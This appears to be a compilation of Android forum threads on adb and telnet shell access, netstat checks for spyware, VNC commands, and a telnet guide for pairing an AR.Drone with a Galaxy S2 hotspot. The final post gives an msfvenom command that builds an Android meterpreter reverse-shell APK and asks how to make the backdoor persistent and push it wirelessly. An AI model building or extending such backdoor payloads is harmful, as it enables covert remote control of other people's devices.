Is there a shell command for *#*#2432546#*#* (*#*#checkin#*#*)?
instead of going to the phone menu all the time, i want to have my phone connected to the computer and to be able to just type the command in the terminal and have it check for updates...
Hasn't it been pretty firmly established at this point that checking in doesn't give you update access any quicker than you would get it anyway?
i understand that. i was just curious if there was an actual command for that or wether that was just built into the dialer app.
all check in does is re-associate your phone with the network and let the mothership know you are alive and well
Related
If keeping your Android free from software that spies on you and your data is important to you, you might want to consider an occasional check.
Get a terminal emulator from the market an load it on your phone.
Open the terminal app and become super user:
Code:
su
Then enter
Code:
netstat -taupe
What follows will be a list of open net connections with IP addresses, both local and foreign. Sometime the process controlling the connection is also given - but not always.
Look over the foreign addresses. Any you are suspicious or unsure of, you can check on your PC.
In Linux open a terminal; in Windoze run cmd -w from the start menu to get a terminal window. Then issue a whois [IP ADDRESS] command. For example...
Code:
whois 209.85.229.102
The result will show information about the host for that IP address - in this example it turns out to be Google... probably one of the good guys... (but until the net neutrality issue is sorted the jury is still out).
So if you find a link to some unknown host belonging to a Internet Provider, in, say Brazil or China, that really has no business being connected to your phone, you may want to think about removing the app that added it, or asking its developer some serious questions.
It might be an idea to run this kind of check fairly often and especially after loading hacks of proprietary applications.
Hello all,
I have been searching the forum but could not find an answer to my question. I have installed a TightVNC server on my dekstop in order to remotly control it by my HTC desire. It works great with the android VNC app.
But the thing is, i only want to send a command line to my PC without using the whole app. I'm designing my own app where i want to send a command lines to my computer. It's just a simple app with a few buttons in order to switch my lights on and off in my room. I have running it on my PC right now with winlirc, which can be controlled by entering a command line.
Is there anyone who can provide me with the Code that connects to the server and can send a command line? If it is not possible to send a command line, then maybe just a way to send a keystroke so i can use autohotkey to act upon it.
Thanks
Have you tried SSH?
I'm working on a windows PC with openSSH at the moment.
But that is just in order to create a secure channel. Don't need it right now since i'm only working in LAN area. Just need the source code that i can put in my app in order to send a command/keystroke
I'm a Linux/UNIX hack, so I play around a lot with shell scripts on my Epic, as well as just doing many things from ConnectBot and adb.
Everything's great from ConnectBot -- the emulator supports ANSI escape sequences, so it works perfectly with vi, command-line editing, etc. Great on the go!
However, I'd like to do the same thing when connect via 'adb shell' from my PC, and that's where it all goes to crap. The DOS command prompt window doesn't seem to support ANSI, window size is not passed through adb, so vi is unusable. Oddly, command-line editing seems to work. Also, I seem to be getting every command echoed, creating a spurious line.
Bottom line: I want to adb a local shell on my Epic from my PC and be able to use it the same way as I do on the phone itself via connectbot, yet with the obvious advantage of a big screen and normal keyboard. Anyone have any solution to this?
Thanks!!
QuickSSHd with PuTTy would probably get you what you're looking for, with the added benefit of being wireless.
I'm not sure where the limitation lies, but cygwin + adb might work.
Setup adb to use telnet and forward a local port, then you can use PuTTY to telnet into the local port. Details in this thread:
http://forum.xda-developers.com/showthread.php?t=535014
curvatura99 said:
Setup adb to use telnet and forward a local port, then you can use PuTTY to telnet into the local port. Details in this thread:
http://forum.xda-developers.com/showthread.php?t=535014
Click to expand...
Click to collapse
Oh, so close!! The thread above has the answer. In short, have adb listen to a local port on the Windows machine and forward it to the device, start the telnet server, and then use PuTTY to telnet into the device (from a Windows cmd prompt):
> adb forward tcp:9999 tcp:23
> adb shell telnetd
adb must be running as root.
Then, use PuTTY to telnet to localhost:9999 (the Windows machine @ 127.0.0.1, port 9999).
Almost works, except the telnet daemon on my Epic is refusing to connect! Looks like a security thing or something. Basically, I get the age-old UNIX telnet daemon message,
Entering character mode
Escape character is '^]'but instead of a "login:" prompt, the connection is immediately closed with the message,
Connection closed by foreign hostThis happens if I try to telnet locally to 127.0.0.1:23 on the Epic itself!!
Without telnetd running, there's no response (as expected). So clearly telnetd is running, listening to the port, responding to it, but just refusing to allow a login.
Any suggestions as to what's wrong? Is interactive login disabled or something?
BTW, this works wirelessly too -- don't need adb at all. Just get a shell prompt on the Epic and start telnetd. Then, you can use PuTTY (or any telnet client) to connect via wifi to <EpicIP>:23.
I tried this too, connected, but have the same instant disconnect problem.
I know this thread is old, but the solution might help someone. You need to start telnetd like this so it will invoke the shell when you telnet in:
I had to adb shell into the phone then run:
# busybox telnetd -l /system/bin/ash
As I'm new here I cannot post links, but if you google for 'Better cmd.exe terminal and ANSI color codes support' you will find another option then port forwarding etc.
Essentially using an alternative cmd.exe (Console) together with an ANSI helper program (ANSICON).
Did the trick for me at least.
Cheers,
Remco
http://forum.xda-developers.com/showthread.php?t=803223
Credits: I cannot take credit for the steps here. This is basically a version specifically for the SGS2 cobbled together by me after reading Shellware's excellent guide here: http://www.shellware.com/BlogEngine...ually-Infrastructure-Enable-Your-ARDrone.aspx. I bought their App to say thanks.
Note: The first time you run this it will seem like you are spending a long time to get it going. After you have done it once, it really takes only a few minutes to repeat. Also, Shellware have scripts that can be semi-permanently added to your AR.Drone to skip out the "laptop bit" but you may invalidate your warranty. See Shellware's site for more information about those.
Stage 1: First off, gather up everything you need:
Samsung Galaxy S2 (duh!)
AR.Drone (double duh!)
A telnet client program:
For the purpose of this guide, we will be using a free Windows tool called PuTTY. You can download it from here: http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. However, feel free to use any telnet client.
Most versions of Windows have one built in. In Windows 7, it is not installed by default so you need to add it manually using "Control Panel" > "Programs" > "Programs and Features" > "Turn Windows features on or off" > "Telnet Client".
A laptop with wi-fi on it
An AR.Drone client program from the Android Marketplace. ARDrone Demo (free by MeanyDev) and AR.Pro (Shell M. Shrader £3.09) have been tested.
NB: I don't think the SGS2 needs to be rooted - so no warranty issues. Mine is rooted, but only because I was trying to get adhocs working - which I couldn't!
NB2: The AR.Drone will not lose it's warranty as the changes you make are temporary.
Stage 2: Preparing your phone:
On your SGS2, go into "Settings", and then "Wireless and network"
Make sure Flight Mode is not turned on!
Scroll down to "Tethering and portable hotspot"
Select "Portable Wi-Fi hotspot settings"
Tick the box against "Portable Wi-Fi hotspot" and answer "Yes" to the prompt to "Disconnect Wi-Fi for using portable Wi-Fi hotspot". I guess you will only see this prompt if wireless is already turned on...
You should get a blue Wi-Fi Hotspot logo on the notification bar across the top.
Select "Configure portable Wi-Fi hotspot"
Give the hotspot a name, e.g., "GALAXY_HOTSPOT"
Set the Security to "Open"
Select "Save"
Stage 3: Fire up your laptop:
On your laptop, look for available wi-fi networks
Select and connect to your phone's hotspot - which should appear as "GALAXY_HOTSPOT" (or whatever you called yours)
**************************************
These next steps probably only need to be ran once as they are unlikely to change. I've tried it a few times and get the same results. I guess the chances are you will find the same address that I found.
**************************************
Once your laptop is connected to your phone's hotspot, you just need to double-check the IP address of your phone. To do this, open a command prompt by pressing the Windows key + R, or by clicking on the start button (or orb as it is now called), and selecting "Run...".
Enter "cmd" and press enter. A command prompt will open.
At the command prompt, type in "ipconfig" and press enter.
Look for the line that says "Default Gateway" under the heading of your wireless network adapter. You are looking for the default gateway of your current wireless connection - it should be something like this: 192.168.43.1. Make a note.
Stage 4: Laptop, say hello to AR.Drone:
Power up your AR.Drone. Waiting for the green lights to come on.
On your laptop, run your telnet program. In our example we are using PuTTY.
In PuTTY, select Telnet and enter the following IP address: 192.168.1.1 (this is the default IP address of the AR.Drone).
Click "Open" in PuTTY to reveal the telnet prompt.
**************************************
Your laptop is now talking to your AR.Drone!
**************************************
Copy and paste the following line into the telnet prompt. PLEASE NOTE: this is all one line - if your browser has wrapped it - be careful to select everything - the line starts with "killall" and ends with "up":
Code:
killall udhcpd ; iwconfig ath0 mode managed essid [COLOR=RoyalBlue][B]GALAXY_HOTSPOT[/B][/COLOR] ; ifconfig ath0 [B][COLOR=SeaGreen]192.168.43.[COLOR=Red]2[/COLOR][/COLOR][/B] netmask 255.255.255.0 up
**************************************
*IMPORTANT* before you press Enter on the keyboard, double check the IP address is correct and hotspot name is correct. In this example, the hotspot was called GALAXY_HOTSPOT. The last part of the IP address should be one number up from the IP address you noted down earler. If you noted 192.168.43.1, then on the telnet command line it should say 192.168.43.2. See how the "1" on the end is now a "2"? Don't miss this step out!
**************************************
Press Enter on the keyboard to run the command.
Your laptop will lose connection with your AR.Drone at this point because you have just told your AR.Drone to connect to your phone instead of your laptop! The session on your laptop might hang. Just close it down.
You are now finished with your laptop.
Stage 5: AR.Drone, say hello to your new best friend:
On your SGS2, fire up your AR.Drone client program and go into the settings to specify the IP address you entered on the telnet command line. In this case we used 192.168.43.2.
Hey presto your AR.Drone client should now work and away you go!
Be safe and have fun!
Let me know if this works for you!
Very nice!
Shell
It would be much nicer and easier if adhoc would work correctly on the sgs II. You may not void your system warranty but changing the drone fw in this manner voids the drone warranty according to them.
You are not altering the firmware. You are using tools provided within the host OS to implement a transient change. There are examples similar to this provided within the Parrot SDK. They can't release code samples exploiting functions then tell devs not to use them.
Apply my infrastructure mode patch and ship your drone to Parrot with it still installed.... That'll void your warranty. Reality is 95% of the time Parrot doesn't dig that deep and blindly reflashes over it.
We could also just as easily argue that the drone needs to support infrastructure networks.
Read the following and the consider it at the heart of the community supporting the AR.Drone on Android: "You don't truly own something until you've voided its warranty."
A warranty is getting voided in either case... you just need to come to terms with which device you want to target....
If you are not comfortable with these risks then this platform probably isn't the right one for you. Drop me a line providing the basic payment details you used when purchasing AR.Pro and I'll promptly issue a refund.
Sent from my GT-I9000 using Tapatalk
Hacked supplicant confirmed as functional on rooted stock S2
http://forum.xda-developers.com/showthread.php?t=1058319
Sent from my GT-I9000 using Tapatalk
I was successful using this guide with my galaxy s2, my ARdrone and an app called 'AR.Pro'.
The Drone settings are back to standard after pressing reset (and probably after power loss as well).
Thanks for posting the guide.
EDIT: I did not patch my drone, that's the reason the changes were non-permanent i think.
Hello, soo im trying to open a link to my phine that I can access anytime but it seems to only work once using this method
msfvenom -p android/meterpreter/reverse_tcp LHOST=***.***.*** LPORT=**** R > /***/***/***.apk
is there anyway I can open a back door that I can access even what my phone isn't on my home wifi but on other wifi/cell data??
also I was wondering if there was a way to send myself the apk wirelessly like a push notification from pc??